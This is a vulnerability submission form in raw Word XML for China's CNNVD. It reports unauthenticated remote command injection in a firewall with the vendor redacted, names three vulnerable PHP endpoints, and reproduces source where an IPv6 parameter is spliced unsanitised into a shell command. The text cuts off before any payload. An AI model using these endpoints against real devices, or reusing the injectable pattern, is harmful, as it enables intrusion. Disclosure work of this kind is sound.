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80" w:rsidRDefault="00566580" w:rsidP="004A691F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D260C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>CNNVD</w:t>
      </w:r>
      <w:r w:rsidR="00067C8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>未公开</w:t>
      </w:r>
      <w:r w:rsidRPr="00D260C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>外部提交</w:t>
      </w:r>
      <w:r w:rsidR="004A691F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00566580" w:rsidRPr="001A61F5" w:rsidRDefault="00566580" w:rsidP="00566580">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a8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7796"/>
      </w:tblGrid>
      <w:tr w:rsidR="00566580" w:rsidTr="00497D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9073" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00566580" w:rsidRPr="002D695F" w:rsidRDefault="00566580" w:rsidP="00497D05">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D695F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>基本</w:t>
            </w:r>
            <w:r w:rsidRPr="002D695F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00566580" w:rsidTr="00497D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00566580" w:rsidRPr="0067732F" w:rsidRDefault="00566580" w:rsidP="00497D05">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0067732F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>漏洞名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7796" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00566580" w:rsidRPr="0067732F" w:rsidRDefault="002E0123" w:rsidP="002E01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xxxxx</w:t>
            </w:r>
            <w:r w:rsidR="006E02CD" w:rsidRPr="006E02CD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>有限公司</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>xxxxxxx</w:t>
            </w:r>
            <w:r w:rsidR="006E02CD" w:rsidRPr="006E02CD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>防火墙多处远程命令执行漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A56544" w:rsidTr="00497D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A56544" w:rsidRPr="0067732F" w:rsidRDefault="00A56544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受影响实体版本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7796" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00967A44" w:rsidRPr="0067732F" w:rsidRDefault="002E0123" w:rsidP="00967A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xxxxxxx</w:t>
            </w:r>
            <w:r w:rsidR="006E02CD" w:rsidRPr="006E02CD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>系列</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00566580" w:rsidTr="00497D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00566580" w:rsidRPr="0067732F" w:rsidRDefault="00566580" w:rsidP="00497D05">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0067732F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>漏洞类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7796" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00566580" w:rsidRPr="0067732F" w:rsidRDefault="00967A44" w:rsidP="00967A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命令注入</w:t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危害等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7796" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00566580" w:rsidRDefault="00967A44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566580" w:rsidRPr="00C179D2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漏洞</w:t>
            </w:r>
            <w:r w:rsidR="00A56544">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>简介</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7796" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004F1C8C" w:rsidRDefault="002E0123" w:rsidP="00967A44">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E0123">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="52"/>
                <w:szCs w:val="52"/>
              </w:rPr>
              <w:t>产品简介</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>…………………………………</w:t>
            </w:r>
            <w:r w:rsidR="004F1C8C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00566580" w:rsidRPr="007B7D49" w:rsidRDefault="002E0123" w:rsidP="00967A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XXXXXXXXXXXXXX</w:t>
            </w:r>
            <w:r w:rsidR="00AD34F3" w:rsidRPr="006E02CD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>防火墙</w:t>
            </w:r>
            <w:r w:rsidR="004F1C8C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>存在</w:t>
            </w:r>
            <w:r w:rsidR="00967A44" w:rsidRPr="00967A44">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>命令</w:t>
            </w:r>
            <w:r w:rsidR="00967A44">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>注入</w:t>
            </w:r>
            <w:r w:rsidR="00AD34F3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
            <w:r w:rsidR="00114052" w:rsidRPr="00114052">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>系统提供命令执行类函数主要方便处理相关应用场景的功能</w:t>
            </w:r>
            <w:r w:rsidR="00114052" w:rsidRPr="00114052">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00114052" w:rsidRPr="00114052">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>而当不合理的使用这类函数，同时调用的变量未考虑安全因素，就会执行恶意的命令调用，被攻击利用。应用中，因为是由程序拼凑命令行（包括参数）来实现调用外部程序的，因此用户也能够通过小计量来突破限制，实现调用其他外部程序。</w:t>
            </w:r>
            <w:r w:rsidR="00E32AA9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>OS</w:t>
            </w:r>
            <w:r w:rsidR="00114052" w:rsidRPr="00114052">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>命令注入和</w:t>
            </w:r>
            <w:r w:rsidR="00114052" w:rsidRPr="00114052">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> SQL </w:t>
            </w:r>
            <w:r w:rsidR="00114052" w:rsidRPr="00114052">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>注入差不多，只不过</w:t>
            </w:r>
            <w:r w:rsidR="00114052" w:rsidRPr="00114052">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> SQL </w:t>
            </w:r>
            <w:r w:rsidR="00114052" w:rsidRPr="00114052">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>注入是针对数据库的，而</w:t>
            </w:r>
            <w:r w:rsidR="00114052" w:rsidRPr="00114052">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> OS </w:t>
            </w:r>
            <w:r w:rsidR="00114052" w:rsidRPr="00114052">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>命令注入是针对操作系统的。</w:t>
            </w:r>
            <w:r w:rsidR="00114052" w:rsidRPr="00114052">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">OS </w:t>
            </w:r>
            <w:r w:rsidR="00114052" w:rsidRPr="00114052">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>命令注入即能够在服务器上执行任意命令，危害性极大。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A10717" w:rsidTr="004B0C0C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9073" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00A10717" w:rsidRDefault="00A10717" w:rsidP="00A107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</w:t>
            </w:r>
            <w:r w:rsidRPr="00855C14">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>基本信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A10717" w:rsidTr="00497D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A10717" w:rsidRPr="00855C14" w:rsidRDefault="00A10717" w:rsidP="00EC6C1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="_Hlk469860741"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>提交机构</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7796" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A10717" w:rsidRDefault="00A10717" w:rsidP="006E02CD">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A10717" w:rsidTr="00497D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A10717" w:rsidRDefault="00A10717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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7796" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A10717" w:rsidRDefault="00A10717" w:rsidP="00497D05">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A10717" w:rsidTr="00497D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A10717" w:rsidRDefault="00A10717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7796" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A10717" w:rsidRDefault="00A10717" w:rsidP="0028316F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A10717" w:rsidTr="00497D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A10717" w:rsidRDefault="00A10717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提交日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7796" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A10717" w:rsidRDefault="00A10717" w:rsidP="00497D05">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="0"/>
      <w:tr w:rsidR="00566580" w:rsidTr="00497D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9073" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00566580" w:rsidRPr="00855C14" w:rsidRDefault="00566580" w:rsidP="00497D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</w:t>
            </w:r>
            <w:r w:rsidR="00A10717">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>验证</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A10717" w:rsidTr="00497D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A10717" w:rsidRPr="00855C14" w:rsidRDefault="00A10717" w:rsidP="00EC6C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漏洞定位</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7796" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004F1C8C" w:rsidRPr="00376B7F" w:rsidRDefault="00376B7F" w:rsidP="006E02CD">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00376B7F">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/Program/Tools/call_command_IPv6.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00376B7F" w:rsidRPr="00376B7F" w:rsidRDefault="00376B7F" w:rsidP="006E02CD">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00376B7F">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/Program/Tools/call_command.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00376B7F" w:rsidRPr="00376B7F" w:rsidRDefault="00376B7F" w:rsidP="006E02CD">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00376B7F">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/Program/Tools/snmp_test.php</w:t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漏洞触发条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7796" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00566580" w:rsidRDefault="004F1C8C" w:rsidP="00497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无需登录可直接进行远程命令注入攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00566580" w:rsidTr="00497D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00566580" w:rsidRPr="00855C14" w:rsidRDefault="00566580" w:rsidP="00497D05">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00855C14">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>漏洞验证过程</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7796" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="008050F1" w:rsidRDefault="00DE04DE" w:rsidP="006E02C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66C5F" wp14:editId="532D8A7C">
                  <wp:extent cx="4813300" cy="2162175"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
                  <wp:docPr id="9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4DE" w:rsidRPr="0048285C" w:rsidRDefault="00DE04DE" w:rsidP="006E02CD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0048285C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>一</w:t>
            </w:r>
            <w:r w:rsidRPr="0048285C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="0048285C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>缺陷文件：</w:t>
            </w:r>
            <w:r w:rsidRPr="0048285C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/Program/Tools/call_command_IPv6.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>从系统入口进入，看看全局有什么设置</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>比如全局过滤，伪全局机制，全局判断登录验证等等</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>知道了系统的全局过滤处理及参数值传输过程之后就好办</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>下面以查找命令执行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无需登陆命令执行漏洞为例</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE"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NDF7050</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系列防火墙系统是需要登录才能操作的</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通过读取系统源码知道了每个文件的带有：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>$AdminUser-&gt;checkLogin()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>变量验证登录状态的。使用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搜索语法筛选出不包括该变量的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文件，</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>include_once("/PDATA/apache/class/Comm.php");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>if(isset($_GET["fl"])) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>if(is_file("/tmp/$_GET[fl]"))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file_get_contents("/tmp/$_GET[fl]");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>} else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"null";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE"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>} else {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>$sn = time();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>$filename = "ping6_result_{$sn}";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ab/>
              <w:t>$fp = fopen("/tmp/{$filename}.sh", "w");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>fwrite($fp, "#!/bin/sh\n");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for($i = 1; $i &lt;= 4; $i++)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 = array();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$runCmd[] = "/bin/ping6  -c 1 -i 1 -w 1 $_GET[ipv6] &gt; /tmp/{$filename}_{$i}"; </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    $runCmd[] = "if [ $? -eq 0 ]; then";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if($i == 1) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04D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$runCmd[] = "  /bin/sed -n '1,1p' /tmp/{$filename}_{$i} &gt;&gt; /tmp/{$filename}";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/bin/sed -n '2,2p' /tmp/{$filename}_{$i} | /bin/sed 's/icmp_seq=1/icmp_seq={$i}/g' &gt;&gt; /tmp/{$filename}";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sleep 1";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"else";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if($i == 1) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04D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$runCmd[] = "  /bin/sed -n '1,1p' /tmp/{$filename}_{$i} &gt;&gt; /tmp/{$filename}";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/bin/echo 'time out' &gt;&gt; /tmp/{$filename}";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"fi";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fwrite($fp, implode("\n", $runCmd));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fwrite($fp, "sleep 5\n");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:tab/>
              <w:t>fwrite($fp, "/bin/rm /tmp/{$filename}*\n");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fclose($fp);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>exec("/bin/chmod 755 /tmp/{$filename}.sh");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>exec("/bin/nohup /tmp/{$filename}.sh &gt; /dev/null 2&gt;&amp;1 &amp;");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echo $filename;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
